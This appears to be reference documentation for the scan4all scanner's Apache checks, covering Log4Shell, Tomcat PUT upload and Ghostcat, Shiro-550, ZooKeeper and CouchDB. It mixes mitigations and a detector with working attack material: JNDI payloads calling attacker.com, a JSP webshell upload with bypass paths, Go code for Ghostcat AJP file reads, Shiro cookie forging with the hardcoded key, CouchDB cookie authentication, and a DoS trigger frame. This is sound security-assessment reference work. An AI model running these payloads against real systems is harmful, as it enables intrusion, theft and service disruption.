
Overview

Apache Software Foundation produces many widely-used open source projects. scan4all includes POCs for critical vulnerabilities in Apache Log4j, Tomcat, Shiro, ZooKeeper, and CouchDB.

Log4j

Log4Shell RCE

Tomcat

File Upload & Read

Shiro

Deserialization RCE

ZooKeeper

Unauthorized Access

CouchDB

RCE & DoS

Apache Log4j

CVE-2021-44228 - Log4Shell

CVE-2021-44228 (Log4Shell)

Type: Remote Code Execution
Affected Versions: 2.0-beta9 through 2.14.1 (the Java 7 and Java 6 branches, 2.12.x and 2.3.x, are affected as well)
Discovery Date: December 2021 (public disclosure 9 December 2021)
CVSS Score: 10.0 (Critical)
Impact: Worldwide; millions of Java deployments
Description: Log4Shell is unauthenticated remote code execution through JNDI lookups evaluated inside logged messages. Log4j 2 expands ${...} lookup expressions found in the message text itself, so any attacker-controlled string that reaches a logger is an injection point: a ${jndi:ldap://...} lookup makes the JVM contact the attacker's server and load the object it returns. No special configuration is needed on the target, which is why it was exploited at scale within hours of disclosure. Exploitation:
// Vulnerable code
logger.info("User: " + userInput);

// Malicious input
${jndi:ldap://attacker.com/exploit}
Common Attack Vectors:
  • HTTP headers (User-Agent, X-Forwarded-For)
  • Form inputs
  • API parameters
  • Any logged user input
Detection Method:
# DNS callback detection: point the lookup at a DNS logger you control; a resolution hit proves the lookup was evaluated
curl -H "User-Agent: ${jndi:ldap://test.dnslog.cn/a}" http://target

# LDAP callback to your own listener. This is an exploitation attempt rather than a probe:
# a vulnerable JVM loads and runs whatever class the listener serves for this path.
curl -H "X-Api-Version: ${jndi:ldap://attacker.com:1389/Basic/Command/calc}" http://target
Payloads:
${jndi:ldap://attacker.com/a}
Mitigation:
1. Upgrade immediately: update to Log4j 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6). 2.15.0 and 2.16.0 each shipped with a follow-up CVE (CVE-2021-45046 and CVE-2021-45105), so do not stop at them.
2. Set the JVM property -Dlog4j2.formatMsgNoLookups=true. Partial mitigation only: the property exists from 2.10 onward and does not cover the configurations behind CVE-2021-45046.
3. Remove the JndiLookup class from the jar (works on any 2.x version and leaves no JNDI lookup code to trigger):
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
4. WAF rules: block requests containing ${jndi: in headers and parameters. Treat this as a speed bump, not a fix: Log4j resolves nested lookups such as ${${lower:j}ndi:...} and ${${::-j}ndi:...} before the JNDI lookup runs, so a literal match on ${jndi: is bypassed unless the WAF normalizes lookups first.
Source: pocs_go/log4j/check.go
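The nested-lookup problem is what separates a useful Log4Shell detector from a grep. The following is an added example written for this page in Go (it is not scan4all's check.go and does not reproduce it): it flattens the ${lower:}, ${upper:} and ":-default" constructs attackers nest around the JNDI prefix, then matches the normalized value. The header names and the attacker.example host in the sample are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"strings"
)

// resolveLookups flattens nested Log4j lookup syntax the way a detector must
// before matching on "${jndi:". It covers the constructs used to hide the
// prefix from a WAF: ${lower:x}, ${upper:x} and the ":-default" fallback of
// any other lookup (${::-j}, ${env:NOPE:-j}). Lookups it cannot resolve stay
// verbatim, so a real "${jndi:...}" survives. depth bounds the recursion.
func resolveLookups(s string, depth int) string {
	if depth > 16 {
		return s
	}
	var out strings.Builder
	i := 0
	for i < len(s) {
		if i+1 < len(s) && s[i] == '$' && s[i+1] == '{' {
			level, j := 0, i // find the matching close brace, honouring nesting
			for ; j < len(s); j++ {
				if j+1 < len(s) && s[j] == '$' && s[j+1] == '{' {
					level++
					j++
					continue
				}
				if s[j] == '}' {
					level--
					if level == 0 {
						break
					}
				}
			}
			if j >= len(s) { // unbalanced: keep the rest as-is
				out.WriteString(s[i:])
				break
			}
			out.WriteString(evalLookup(resolveLookups(s[i+2:j], depth+1))) // innermost first
			i = j + 1
			continue
		}
		out.WriteByte(s[i])
		i++
	}
	return out.String()
}

// evalLookup evaluates one lookup body whose nested lookups are already flattened.
func evalLookup(inner string) string {
	if k := strings.Index(inner, ":"); k >= 0 {
		switch strings.ToLower(inner[:k]) { // Log4j lower-cases the lookup name
		case "lower":
			return strings.ToLower(inner[k+1:])
		case "upper":
			return strings.ToUpper(inner[k+1:])
		}
	}
	if k := strings.Index(inner, ":-"); k >= 0 {
		return inner[k+2:] // unknown lookup with a default: Log4j yields the default
	}
	return "${" + inner + "}" // unresolved (jndi:, date:, ...): keep verbatim
}

// IsLog4ShellProbe reports whether a value contains a JNDI lookup once all
// nesting is resolved. Matching is case-insensitive because Log4j is.
func IsLog4ShellProbe(v string) bool {
	return strings.Contains(strings.ToLower(resolveLookups(v, 0)), "${jndi:")
}

// ScanHeaders returns the names of request headers carrying a JNDI lookup.
func ScanHeaders(h map[string]string) []string {
	var hits []string
	for name, v := range h {
		if IsLog4ShellProbe(v) {
			hits = append(hits, name)
		}
	}
	return hits
}

func main() {
	// Constructed sample headers; attacker.example is a placeholder host.
	samples := map[string]string{
		"User-Agent":      "Mozilla/5.0 (X11; Linux x86_64)",
		"X-Api-Version":   "${jndi:ldap://attacker.example/a}",
		"X-Forwarded-For": "${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
		"Referer":         "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
	}
	for _, name := range ScanHeaders(samples) {
		fmt.Printf("%s: %s -> %s\n", name, samples[name], resolveLookups(samples[name], 0))
	}
}
```

The resolver deliberately does not evaluate env:, sys: or date: lookups; it only takes their ":-" default, because that default is the part an attacker controls. Anything it cannot resolve is left in place, so a plain ${jndi:...} is never accidentally consumed.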

Apache Tomcat

CVE-2017-12615 - PUT Method File Upload

CVE-2017-12615

Type: Arbitrary File Upload
Affected Versions: 7.0.0 - 7.0.79 (fixed in 7.0.81)
Discovery Date: September 2017
CVSS Score: 8.1 (High)
Description: Tomcat's DefaultServlet honours HTTP PUT when its readonly init-param is set to false. A request for /shell.jsp/ does not match the *.jsp mapping (the path ends in a slash), so the DefaultServlet handles it instead of the JSP servlet, and on Windows the file system discards the trailing slash when the file is written. The result is shell.jsp on disk, which the JSP servlet happily executes on the next GET. The follow-up CVE-2017-12617 (fixed in 7.0.82, 8.0.47, 8.5.23, 9.0.1) covers the same trick on all operating systems, so do not treat a Linux host as safe just because this CVE is Windows-only. Requirements:
  • Windows operating system (any OS for CVE-2017-12617)
  • HTTP PUT method reaching the DefaultServlet
  • readonly init-param set to false (the default is true)
Exploitation:
# Upload a test file, then fetch it back: 201 (created) or 204 (overwritten) on PUT followed by 200 on GET confirms write access
curl -X PUT --data-binary "test content" http://target/vtset.txt
curl -i http://target/vtset.txt

# Upload a JSP webshell (the trailing slash keeps the JSP servlet from claiming the path).
# JSP scriptlets are Java, so the parameter name needs double quotes; 'cmd' would be an invalid char literal.
curl -X PUT --data-binary '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' http://target/shell.jsp/
Bypass Technique:
# Trailing slash, NTFS alternate data stream, or trailing space: each defeats the *.jsp mapping on Windows
PUT /shell.jsp/
PUT /shell.jsp::$DATA
PUT /shell.jsp%20
Remove anything you upload during a test; DELETE is honoured under the same readonly=false setting.
Source: pocs_go/tomcat/CVE_2017_12615.go

CVE-2020-1938 - Ghostcat (AJP File Read)

CVE-2020-1938 (Ghostcat)

Type: Arbitrary File Read / RCE
Affected Versions: 6.x (all), 7.x < 7.0.100, 8.x < 8.5.51, 9.x < 9.0.31
Discovery Date: February 2020
CVSS Score: 9.8 (Critical)
Default Port: 8009 (AJP)
Description: Ghostcat abuses the AJP (Apache JServ Protocol) connector, which older Tomcat versions enabled on 0.0.0.0:8009 by default. AJP lets the front-end proxy pass arbitrary request attributes to Tomcat, and Tomcat trusted them: setting javax.servlet.include.request_uri, javax.servlet.include.servlet_path and javax.servlet.include.path_info in an AJP forward request makes the DefaultServlet serve any file inside the web application (web.xml, compiled classes, source), whatever the request URI says. Files outside the webapp root are not reachable this way. RCE follows when the attacker can get a file containing JSP code into the webapp (via CVE-2017-12615 or any upload feature) and then sends the same attributes with a *.jsp request URI, so the JSP servlet compiles and executes that file. Attack Scenarios:
1. File Read: read web.xml, configuration files and source code under WEB-INF.
2. Credential Theft: extract database credentials and secrets from those files.
3. File Upload + Include = RCE: upload a file containing JSP code via CVE-2017-12615 (or any upload feature), then include it through AJP with a .jsp request URI so it is executed.
Exploitation:
# Read web.xml: an AJP forward request for any URI, with the three include attributes pointing at WEB-INF/web.xml
AJP request to read /WEB-INF/web.xml

# Common targets (paths are relative to the web application root; /etc/passwd is out of reach)
/WEB-INF/web.xml
/WEB-INF/classes/application.properties
Fixed versions bind the AJP connector to loopback and require a shared secret (secretRequired="true") by default. On older versions disable the connector in server.xml, or bind it to 127.0.0.1 and set a secret, and never expose 8009 through a firewall.
Source: pocs_go/tomcat/CVE_2020_1938.go
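Since the "AJP request" above is the whole exploit, it is worth seeing the bytes. The following is an added example in Go, written for this page and not scan4all's CVE_2020_1938.go: it builds the AJP13 forward request with the three include attributes, parses the container's SEND_BODY_CHUNK / END_RESPONSE packets, and wraps both in a fetch against a connector address you supply. The probe URI "/probe" and the localhost:8080 server name are placeholders.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
	"net"
	"time"
)

// ajpString appends an AJP13 string: 2-byte big-endian length, bytes, NUL.
func ajpString(b *bytes.Buffer, s string) {
	binary.Write(b, binary.BigEndian, uint16(len(s)))
	b.WriteString(s)
	b.WriteByte(0)
}

// BuildGhostcatRequest builds a JK_AJP13_FORWARD_REQUEST for GET reqURI carrying
// the three javax.servlet.include.* attributes; the DefaultServlet then serves
// target (relative to the webapp root, e.g. "WEB-INF/web.xml") instead of reqURI.
func BuildGhostcatRequest(serverName string, serverPort uint16, reqURI, target string) []byte {
	var p bytes.Buffer
	p.WriteByte(0x02) // prefix code: JK_AJP13_FORWARD_REQUEST
	p.WriteByte(0x02) // method code: GET
	ajpString(&p, "HTTP/1.1")
	ajpString(&p, reqURI)
	ajpString(&p, "127.0.0.1") // remote_addr as a proxy would report it
	ajpString(&p, "localhost") // remote_host
	ajpString(&p, serverName)
	binary.Write(&p, binary.BigEndian, serverPort)
	p.WriteByte(0)                                // is_ssl = false
	binary.Write(&p, binary.BigEndian, uint16(1)) // num_headers
	ajpString(&p, "Host")                         // literal header name (0xA00B is the coded form)
	ajpString(&p, serverName)
	for _, kv := range [][2]string{
		{"javax.servlet.include.request_uri", "/"},
		{"javax.servlet.include.path_info", target},
		{"javax.servlet.include.servlet_path", "/"},
	} {
		p.WriteByte(0x0A) // SC_A_REQ_ATTRIBUTE: name string, value string
		ajpString(&p, kv[0])
		ajpString(&p, kv[1])
	}
	p.WriteByte(0xFF) // SC_A_ARE_DONE
	var pkt bytes.Buffer
	pkt.Write([]byte{0x12, 0x34}) // client-to-container magic
	binary.Write(&pkt, binary.BigEndian, uint16(p.Len()))
	pkt.Write(p.Bytes())
	return pkt.Bytes()
}

// ReadAJPBody concatenates SEND_BODY_CHUNK payloads from a raw container response and stops at END_RESPONSE.
func ReadAJPBody(stream []byte) ([]byte, error) {
	var body []byte
	for len(stream) >= 4 {
		if stream[0] != 'A' || stream[1] != 'B' {
			return nil, errors.New("bad AJP response magic")
		}
		n := int(binary.BigEndian.Uint16(stream[2:4]))
		if n == 0 || len(stream) < 4+n {
			return nil, errors.New("truncated AJP packet")
		}
		payload := stream[4 : 4+n]
		switch payload[0] {
		case 0x03: // SEND_BODY_CHUNK: 2-byte chunk length, data (Tomcat adds a trailing NUL)
			if len(payload) < 3 || len(payload) < 3+int(binary.BigEndian.Uint16(payload[1:3])) {
				return nil, errors.New("short body chunk")
			}
			l := int(binary.BigEndian.Uint16(payload[1:3]))
			body = append(body, payload[3:3+l]...)
		case 0x05: // END_RESPONSE
			return body, nil
		}
		stream = stream[4+n:]
	}
	return nil, errors.New("stream ended before END_RESPONSE")
}

// FetchViaAJP sends the request to a connector (addr is host:8009). The connector keeps
// the connection open for reuse after END_RESPONSE, so the read runs until the deadline.
func FetchViaAJP(addr, serverName string, serverPort uint16, target string) ([]byte, error) {
	conn, err := net.DialTimeout("tcp", addr, 5*time.Second)
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	conn.SetDeadline(time.Now().Add(10 * time.Second))
	if _, err := conn.Write(BuildGhostcatRequest(serverName, serverPort, "/probe", target)); err != nil {
		return nil, err
	}
	raw, _ := io.ReadAll(conn)
	return ReadAJPBody(raw)
}

func main() {
	fmt.Printf("% x\n", BuildGhostcatRequest("localhost", 8080, "/probe", "WEB-INF/web.xml"))
}
```

For the RCE variant change "/probe" to a URI ending in .jsp and set target to the uploaded file; the packet layout is otherwise identical, which is why the same check covers both scenarios.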

Apache Shiro

CVE-2016-4437 - Shiro-550 Deserialization RCE

CVE-2016-4437 (Shiro-550)

Type: Deserialization RCE
Affected Versions: 1.2.4 and earlier (fixed in 1.2.5). Later versions remain exploitable when the application configures a static cipherKey that leaks, and 1.4.1 and earlier are separately exposed to the Shiro-721 padding-oracle attack (CVE-2019-12422).
Discovery Date: 2016
CVSS Score: 8.1 (High)
Alternative Name: Shiro-550
Description: Shiro's rememberMe cookie is a Java-serialized PrincipalCollection, AES-encrypted and base64-encoded. Up to 1.2.4 the AES key was hardcoded in the Shiro source, so anyone can forge a cookie: serialize a gadget-chain object, encrypt it with the known key, and send it. Shiro decrypts and deserializes the cookie while resolving the subject, before any authentication decision, which yields remote code execution. Technical Details:
  • Component: RememberMe functionality (CookieRememberMeManager)
  • Encryption: AES-128 in CBC mode with PKCS#5 padding; a random 16-byte IV is prepended to the ciphertext and the whole value is base64-encoded
  • Known Key: kPH+bIxk5D2deZiIxcaaaA== (Base64)
  • Attack: Java deserialization with gadget chains
Exploitation Process:
1. Generate Payload: create a malicious Java object with a gadget chain such as CommonsCollections or CommonsBeanutils.
2. Serialize: serialize the payload object (the stream starts with the bytes AC ED 00 05).
3. Encrypt: AES-CBC encrypt with the hardcoded key and a fresh random IV, prepending the IV.
4. Base64 Encode: encode IV plus ciphertext.
5. Send Cookie: set the result as the rememberMe cookie value on any request.
Detection:
# Check for Shiro: send any rememberMe value; Shiro answers a cookie it cannot decrypt with rememberMe=deleteMe.
# (curl -v prints headers to stderr, so dump them to stdout with -D - instead)
curl -s -D - -o /dev/null -b "rememberMe=1" http://target | grep -i "rememberMe=deleteMe"

# Expected response header
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=...

# Key check: a cookie encrypted under the correct key is NOT answered with deleteMe,
# which is how scanners confirm the default key without executing anything on the target.
Gadget Chains:
  • Apache Commons Collections
  • Apache Commons Beanutils (a shiro-core dependency, so often present even when Commons Collections is not)
  • Spring Framework
  • ROME
Source: pocs_go/shiro/CVE_2016_4437.go
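The cookie format is simple enough to reproduce exactly, and doing so gives a second, offline check: a captured rememberMe cookie that decrypts under the default key with valid padding to a stream starting AC ED 00 05 was produced by a vulnerable install. The following is an added Go example written for this page (not scan4all's CVE_2016_4437.go): it implements Shiro's IV || AES-CBC || base64 layout around the hardcoded key and a KeyMatches check. The serialized blob in main is a constructed stand-in with the right magic bytes, not a gadget chain.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
)

// ShiroDefaultKey is the AES key hardcoded in Shiro 1.2.4 and earlier (Base64).
const ShiroDefaultKey = "kPH+bIxk5D2deZiIxcaaaA=="

// javaSerialMagic opens every Java serialization stream.
var javaSerialMagic = []byte{0xAC, 0xED, 0x00, 0x05}

func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("plaintext is not block aligned")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptRememberMe reproduces Shiro's cookie layout:
// base64( IV || AES-128-CBC(key, PKCS5(serialized)) ) with a random 16-byte IV.
func EncryptRememberMe(keyB64 string, serialized []byte) (string, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	pt := pkcs5Pad(serialized)
	out := make([]byte, aes.BlockSize+len(pt))
	copy(out, iv)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[aes.BlockSize:], pt)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptRememberMe reverses EncryptRememberMe. Under the wrong key the
// plaintext is random bytes and the padding check rejects it almost always.
func DecryptRememberMe(keyB64, cookie string) ([]byte, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("cookie too short or not block aligned")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	return pkcs5Unpad(pt)
}

// KeyMatches reports whether a captured rememberMe cookie was produced under
// keyB64: it must decrypt with valid padding to a Java serialization stream.
// Run it over a key list to confirm the default key without sending a payload.
func KeyMatches(keyB64, cookie string) bool {
	pt, err := DecryptRememberMe(keyB64, cookie)
	return err == nil && bytes.HasPrefix(pt, javaSerialMagic)
}

func main() {
	// Constructed stand-in for a serialized object: real magic, dummy body.
	blob := append(append([]byte{}, javaSerialMagic...), "not-a-real-object"...)
	cookie, _ := EncryptRememberMe(ShiroDefaultKey, blob)
	fmt.Println(cookie, KeyMatches(ShiroDefaultKey, cookie))
}
```

KeyMatches works on cookies the server itself issued (log into the application with "remember me" ticked and capture the Set-Cookie), so it never has to send serialized data to the target; the active deleteMe-based key check in the Detection section is the alternative when no legitimate cookie can be obtained.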

Apache ZooKeeper

Unauthorized Access

ZooKeeper Unauthorized Access

Type: Unauthorized Access
Affected Versions: Various (misconfigured)
Default Port: 2181
Issue: No authentication by default
Description: ZooKeeper ships without client authentication, and the ACL most clients put on new znodes is world:anyone with full rights (OPEN_ACL_UNSAFE). An exposed instance therefore lets anyone read and modify the coordination data that distributed systems such as Kafka, HBase and Hadoop keep there. Impact:
  • Configuration tampering
  • Service disruption
  • Information disclosure
  • Cluster manipulation
Detection:
# Four-letter-word commands over the client port (the server answers and closes the connection)
echo "ruok" | nc target 2181
# Response: imok

# Dump sessions and ephemeral znodes (not the whole tree)
echo "dump" | nc target 2181

# Server version, mode and connected clients
echo "stat" | nc target 2181

# Caveat: since 3.5.3 four-letter words must be whitelisted (4lw.commands.whitelist, default only srvr),
# so a refused ruok or dump proves nothing about authentication. The real test is reading the tree
# over the client protocol, which needs no credentials on a default install:
zkCli.sh -server target:2181 ls /
Shodan Query:
port:2181 "zookeeper"
Source: pocs_go/apache/poc-go-zookeeper-unauth.go

Apache CouchDB

CVE-2022-24706 - Erlang Cookie RCE

CVE-2022-24706

Type: Remote Code Execution
Affected Versions: Apache CouchDB before 3.2.2 with the Erlang distribution ports reachable
Discovery Date: February 2022
CVSS Score: 10.0 (Critical)
Port: 4369 (epmd), 5984 (CouchDB HTTP API), plus the per-node distribution port that epmd advertises
Description: CouchDB runs as an Erlang node and uses Erlang distribution for clustering. Any peer that knows the node's cookie can join the cluster and evaluate arbitrary Erlang on it, which includes os:cmd/1 and therefore OS commands as the CouchDB user. Before 3.2.2 the shipped vm.args set the cookie to "monster", so an installation that exposed epmd (port 4369) and the distribution port could be taken over without any CouchDB credentials. 3.2.2 refuses to start with that cookie value. Requirements:
  • Port 4369 (epmd) accessible
  • Erlang distribution port accessible (random by default; epmd tells you which one)
  • Default or known Erlang cookie
Default Cookie: monster
Exploitation Process:
1. Query EPMD: send a NAMES_REQ to port 4369 to discover registered Erlang nodes and their distribution ports.
2. Connect to Node: open a TCP connection to the discovered distribution port and start the handshake with the name message.
3. Authenticate: answer the node's challenge with MD5(cookie ++ challenge); that digest is all the distribution protocol checks.
4. Execute Commands: call rpc:call(Node, os, cmd, ["id"]) or equivalent over the established link.
Shodan Query:
port:4369 "name couchdb at"
Source: pocs_go/apache/CVE-2022-24706.go
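Steps 1 and 3 are the parts worth showing concretely. The following is an added Go example written for this page (not scan4all's CVE-2022-24706.go): the two EPMD request packets, a parser for the NAMES_RESP that epmd returns, and the challenge digest that authenticates the distribution handshake. It does not implement the handshake framing itself. The NAMES_RESP bytes in main are constructed, with a made-up port.

```go
package main

import (
	"bufio"
	"bytes"
	"crypto/md5"
	"encoding/binary"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// NamesRequest is the EPMD NAMES_REQ: 2-byte big-endian length, then 'n'.
func NamesRequest() []byte { return []byte{0x00, 0x01, 'n'} }

// PortPleaseRequest is the EPMD PORT_PLEASE2_REQ ('z' + node name) that
// returns one node's distribution port and protocol versions.
func PortPleaseRequest(node string) []byte {
	msg := append([]byte{'z'}, node...)
	out := make([]byte, 2, 2+len(msg))
	binary.BigEndian.PutUint16(out, uint16(len(msg)))
	return append(out, msg...)
}

// ParseNamesResponse decodes NAMES_RESP: a 4-byte epmd port followed by one
// "name <node> at port <n>" line per registered node. The map value is the
// node's distribution port, which is the one the handshake talks to.
func ParseNamesResponse(b []byte) (map[string]int, error) {
	if len(b) < 4 {
		return nil, errors.New("short NAMES_RESP")
	}
	nodes := map[string]int{}
	sc := bufio.NewScanner(bytes.NewReader(b[4:]))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var name string
		var port int
		if _, err := fmt.Sscanf(line, "name %s at port %d", &name, &port); err != nil {
			return nil, fmt.Errorf("unparseable line %q: %w", line, err)
		}
		nodes[name] = port
	}
	return nodes, nil
}

// ChallengeDigest is the only secret-dependent step of the distribution
// handshake: MD5(cookie ++ decimal challenge). A peer that can produce it for
// the node's challenge is accepted as a cluster member with full privileges.
func ChallengeDigest(cookie string, challenge uint32) []byte {
	sum := md5.Sum([]byte(cookie + strconv.FormatUint(uint64(challenge), 10)))
	return sum[:]
}

// UsesDefaultCookie checks a captured (challenge, digest) pair against the
// pre-3.2.2 default cookie "monster".
func UsesDefaultCookie(challenge uint32, digest []byte) bool {
	return bytes.Equal(ChallengeDigest("monster", challenge), digest)
}

func main() {
	// Constructed NAMES_RESP as a CouchDB node would register it (port made up).
	resp := append([]byte{0x00, 0x00, 0x11, 0x11}, "name couchdb at port 39653\n"...)
	nodes, err := ParseNamesResponse(resp)
	fmt.Println(nodes, err)
	fmt.Printf("challenge 12345 under the default cookie: %x\n", ChallengeDigest("monster", 12345))
}
```

Because the digest is an unsalted MD5 over cookie plus challenge, a captured handshake also lets you test cookie guesses offline, which is why "a cookie nobody knows" is the only durable fix and why 3.2.2 forces one to be chosen.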

CVE-2020-13935 - Tomcat WebSocket DoS

CVE-2020-13935

Type: Denial of Service
Affected Versions: Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56, 7.0.27 to 7.0.104
Discovery Date: July 2020
CVSS Score: 7.5 (High)
Description: A Tomcat bug, listed here because its POC lives in pocs_go/apache/: the WebSocket implementation did not validate the payload length of an incoming frame. An invalid length sent the frame reader into an infinite loop, and a handful of such frames could pin every request-processing thread and deny service. Technical Details:
  • Malformed client frame using the 64-bit extended payload length (7-bit length field = 127)
  • Most significant bit of the 64-bit length set to 1
  • Violates RFC 6455 section 5.2, which requires that bit to be 0
  • Vulnerable Tomcat spins in an infinite loop on the frame instead of closing the connection (CPU exhaustion rather than memory allocation)
Source: pocs_go/apache/CVE-2020-13935.go
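The frame itself is a handful of bytes, and the fix is a handful of checks. The following is an added Go example written for this page (not scan4all's CVE-2020-13935.go): a frame-header validator that enforces the RFC 6455 length rules, beside builders for a valid masked text frame and for the frame that triggers the bug. The fixed masking key is a test-vector convenience only.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// ParseFrameHeader validates a WebSocket frame header per RFC 6455 section 5.2
// and returns the declared payload length and the header size. It rejects the
// exact input CVE-2020-13935 abused: a 64-bit extended length with its most
// significant bit set. It also rejects non-minimal length encodings.
func ParseFrameHeader(b []byte) (payloadLen uint64, headerLen int, err error) {
	if len(b) < 2 {
		return 0, 0, errors.New("short header")
	}
	if b[0]&0x70 != 0 {
		return 0, 0, errors.New("RSV bits set without a negotiated extension")
	}
	masked := b[1]&0x80 != 0
	length := uint64(b[1] & 0x7F)
	headerLen = 2
	switch length {
	case 126:
		if len(b) < 4 {
			return 0, 0, errors.New("short extended length")
		}
		length = uint64(binary.BigEndian.Uint16(b[2:4]))
		if length < 126 {
			return 0, 0, errors.New("non-minimal 16-bit length")
		}
		headerLen = 4
	case 127:
		if len(b) < 10 {
			return 0, 0, errors.New("short extended length")
		}
		length = binary.BigEndian.Uint64(b[2:10])
		if length&(1<<63) != 0 {
			return 0, 0, errors.New("64-bit payload length has MSB set (RFC 6455 violation)")
		}
		if length < 1<<16 {
			return 0, 0, errors.New("non-minimal 64-bit length")
		}
		headerLen = 10
	}
	if masked {
		headerLen += 4
	}
	if len(b) < headerLen {
		return 0, 0, errors.New("short header")
	}
	return length, headerLen, nil
}

// maskedFrame builds a client-to-server frame (clients must mask) from the
// first header byte, the 7-bit length byte, extended length bytes and payload.
func maskedFrame(first, second byte, ext []byte, payload []byte) []byte {
	key := []byte{0x11, 0x22, 0x33, 0x44} // fixed key: fine for a test vector, never for a real client
	f := append([]byte{first, second | 0x80}, ext...)
	f = append(f, key...)
	for i, c := range payload {
		f = append(f, c^key[i%4])
	}
	return f
}

// TextFrame encodes a short (under 126 bytes) masked text frame.
func TextFrame(msg string) []byte {
	if len(msg) >= 126 {
		panic("TextFrame only handles the 7-bit length form")
	}
	return maskedFrame(0x81, byte(len(msg)), nil, []byte(msg))
}

// MalformedLengthFrame is the CVE-2020-13935 trigger: a masked text frame whose
// 7-bit length says 127 and whose 8-byte extended length has bit 63 set.
func MalformedLengthFrame() []byte {
	ext := make([]byte, 8)
	binary.BigEndian.PutUint64(ext, 1<<63|1)
	return maskedFrame(0x81, 127, ext, nil)
}

func main() {
	for name, f := range map[string][]byte{"text": TextFrame("hello"), "malformed": MalformedLengthFrame()} {
		n, h, err := ParseFrameHeader(f)
		fmt.Printf("%-9s len=%d header=%d err=%v\n", name, n, h, err)
	}
}
```

A correct server closes the connection with status 1002 (protocol error) as soon as ParseFrameHeader fails; the vulnerable versions instead kept re-reading the same bytes. Any implementation that accepts a length it then fails to make progress on is a DoS, which is the general lesson behind this CVE.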

Usage

# Scan for all Apache vulnerabilities
scan4all -h http://target.com

# Focus on specific product
scan4all -h http://target.com -poc log4j
scan4all -h http://target.com -poc tomcat

# Test specific CVE
scan4all -h http://target.com -poc CVE-2021-44228

Detection Summary

Vulnerability      | Port                               | Detection Method
Log4j (Log4Shell)  | 80, 443, any port that logs input  | JNDI callback payload (DNS or LDAP listener)
Tomcat PUT Upload  | 8080, 8443                         | PUT a test file, then GET it back
Tomcat Ghostcat    | 8009                               | AJP forward request with include attributes
Shiro-550          | 80, 443                            | rememberMe=deleteMe in the Set-Cookie response
ZooKeeper Unauth   | 2181                               | Four-letter-word commands, unauthenticated zkCli read
CouchDB RCE        | 4369 + advertised dist port, 5984  | EPMD names query, then handshake with the default cookie

Mitigation Best Practices

Keep Updated

Apply security patches immediately for critical vulnerabilities

Minimize Exposure

Don’t expose management ports to the internet

Enable Authentication

Configure authentication for all services

Monitor Logs

Watch for exploitation attempts in logs

Source Code Location

pocs_go/
├── log4j/
│   ├── check.go
│   └── payloads.go
├── tomcat/
│   ├── CVE_2017_12615.go
│   └── CVE_2020_1938.go
├── shiro/
│   └── CVE_2016_4437.go
└── apache/
    ├── CVE-2020-13935.go
    ├── CVE-2022-24706.go
    └── poc-go-zookeeper-unauth.go

References

Apache products are ubiquitous in enterprise environments. Regular security assessments are critical.
